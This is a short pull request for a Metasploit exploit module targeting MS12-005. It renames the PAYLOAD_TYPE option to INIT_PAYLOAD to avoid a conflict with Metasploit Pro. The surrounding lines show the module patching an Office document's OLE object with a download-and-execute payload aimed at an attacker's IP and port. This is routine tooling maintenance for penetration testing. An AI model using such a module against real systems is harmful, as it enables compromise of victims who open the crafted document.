### PR TITLE
Rename the PAYLOAD_TYPE datastore option

### DIFF
--- a/modules/exploits/windows/fileformat/ms12_005.rb
+++ b/modules/exploits/windows/fileformat/ms12_005.rb
@@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 			register_options(
 				[
-					OptEnum.new('PAYLOAD_TYPE', [true, "The initial payload type", 'PYTHON', %w(RUBY PYTHON)]),
+					OptEnum.new('INIT_PAYLOAD', [true, "The initial payload type", 'PYTHON', %w(RUBY PYTHON)]),
 					OptString.new("BODY", [false, 'The message for the document body', '']),
 					OptString.new('FILENAME', [true, 'The Office document macro file', 'msf.docm'])
 				], self.class)
@@ -144,7 +144,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		when /oleObject1\.bin/
 			# Patch the OLE object file with our payload
 			print_status("Patching OLE object")
-			ptype = datastore['PAYLOAD_TYPE'] == 'PYTHON' ? :py : :rb
+			ptype = datastore['INIT_PAYLOAD'] == 'PYTHON' ? :py : :rb
 			p     = get_download_exec_payload(ptype, @ip, @port)
 			buf   = buf.gsub(/MYPAYLOAD/, p)
 


### PR DESCRIPTION
This datastore option conflicts with a reserved option in Pro causing
this module to fail in Pro.
